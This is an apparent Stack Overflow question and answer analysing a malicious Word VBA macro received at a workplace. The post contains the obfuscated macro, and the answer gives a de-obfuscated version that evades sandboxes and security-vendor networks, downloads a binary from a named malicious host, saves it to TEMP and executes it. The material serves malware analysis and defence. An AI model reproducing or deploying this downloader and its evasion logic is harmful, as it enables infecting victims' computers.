# What exactly does this malicious vba code do?

Tags: vba, ms-word

I just received this macro based document at my workplace with this malicious macro code inside.
As vb.net is not really my strong side I can't exactly figure out what it does.
This is the only macro that I could find in the document.
As the code is strongly obfuscated I think it's malicious.

```
Public Sub Document_Close()
On Error GoTo SWuc
ZQZf
Exit Sub
SWuc:
End Sub
Public Sub ZQZf()
Dim vmKT As String
Dim UwuV As String
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2)
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89))
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32))
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99))
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452)
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67))
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2)
For Each ofJE In OImbM
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE)
Next
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo  nniitoaeddyawbf'lnl a", 249))
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9))
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37)
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19))
CallByName wATB, s(17, "yTep", 11), 4, 1
CallByName wATB, s(27, "nepO", 11), 1
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2)
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2
CallByName wATB, s(8, "solCe", 14), 1
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV
End Sub
Public Function OImbM()
OImbM = rHOu(Array(s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), s(101, "TSS SMIOYECCS", 139), _
s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), _
s(54, "IYREEFE", 9), s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), s(65, "SOHGNIT", 27), _
s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), _
s(13, "ESREVR", 29), s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), s(19, "RAIO RNHEATMC", 75), _
s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), s(11, "RTORCIMDNE", 99)))
End Function
Public Sub UWaFZ(ByVal ltfqE As String)
Err.Raise Number:=2, Description:=ltfqE
End Sub
Public Function qizB(ByVal DVnR As String)
Set qizB = feZmA(CreateObject(DVnR))
End Function
Public Function feZmA(ByVal jfcO As Object)
Set feZmA = jfcO
End Function
Public Function rHOu(ByVal iMqIc)
rHOu = iMqIc
End Function
Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String
Dim qnJn As Integer
qnJn = GzSvR(DDniC, Len(Sfrf))
Do While Len(s) < Len(Sfrf)
s = s & gOtmH(Sfrf, qnJn)
qnJn = GzSvR((qnJn + QuJk), Len(Sfrf))
Loop
End Function
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String
gOtmH = Right(Left(vdHA, qnJn + 1), 1)
End Function
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer
GzSvR = JtMKn - (PfnR * (JtMKn \ PfnR))
End Function
```

Comment: This is not VB.NET, this is a VBA script. SO is not a site where one can just put his code and hoping for somebody to do the work for him...

Comment: It appears to be a binary downloader.  It sends 2 http GET requests (the first of which looks like it captures your IP address and the second downloads a file named `office16.bin`).  It then saves the binary to a file and uses a shell to execute it.  My guess is that this is trying to add your machine to a bot net.

Comment: @Comintern thank you for your help!
In the meantime I could figure out in a sandbox enviroment, that the script is making an autorun entry in the registry and also downloads or creates a exe file in the appdata folder.
Sorry if I chose the wrong site with SO to analyse such a code!
Just fyi: Virustotal analyses this code with a score of 0/54 - wow

Answer (score 7):

**WARNING: DO NOT RUN THIS CODE (or the OP's)**

This is a binary downloader, and at least on the VBA side is script-kiddie level code. When I de-obfuscate it, replace the mangled names, and inline some of the function calls it looks like this:

```
Public Sub Document_Close()
    On Error GoTo QuietExit
    MaliciousCode
    Exit Sub
QuietExit:
End Sub

Public Sub MaliciousCode()
    Err.Raise 666, , "Do not execute this."  'NOTE: I added this ;-)

    Dim response As String
    Dim filePath As String

    Set wdApp = ThisDocument.Application
    If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username"
    If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history"

    Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
    webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address"

    response = webRequest.ResponseText
    For Each isp In GetBadISPList
        If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp
    Next

    webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file"

    Set env = CreateObject("WScript.Shell").Environment("PROCESS")
    filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp"
    Set outStream = CreateObject("ADODB.Stream")
    outStream.Type = adTypeBinary
    outStream.Open
    outStream.Write webRequest.ResponseBody
    outStream.SaveToFile
    outStream.Close

    CreateObject("WScript.Shell").Exec filePath
End Sub

Public Function GetBadISPList()
    GetBadISPList = Array("AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", "CISCO SYSTEMS", _
                       "CLOUD", "DATA CENTER", "DATACENTER", "DATACENTRE", "DEDICATED", "ESET, SPOL", _
                       "FIREEYE", "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", "HOSTING", _
                       "LEASEWEB", "MICROSOFT", "NFORCE", "OVH SAS", "PROOFPOINT", "SECURITY", _
                       "SERVER", "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _
                       "BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO")
End Function
```

The download site is registered in Pakistan and is flagged by Google as malicious. Note that my initial suspicious that it was a bot-net installer was based on getting the IP address, but it looks like a primitive attempt to avoid running on hosted platforms and AV provider domains.  The binary could actually be anything.

The reason that Virustotal doesn't hit on the file is apparently due to the obfuscation. The code above [actually does get some hits](https://www.virustotal.com/en/file/57374ffa2c0352d67c9f6fcd5691a2f06a33355f8998e656266ccc3fb3477f86/analysis/1470757674/).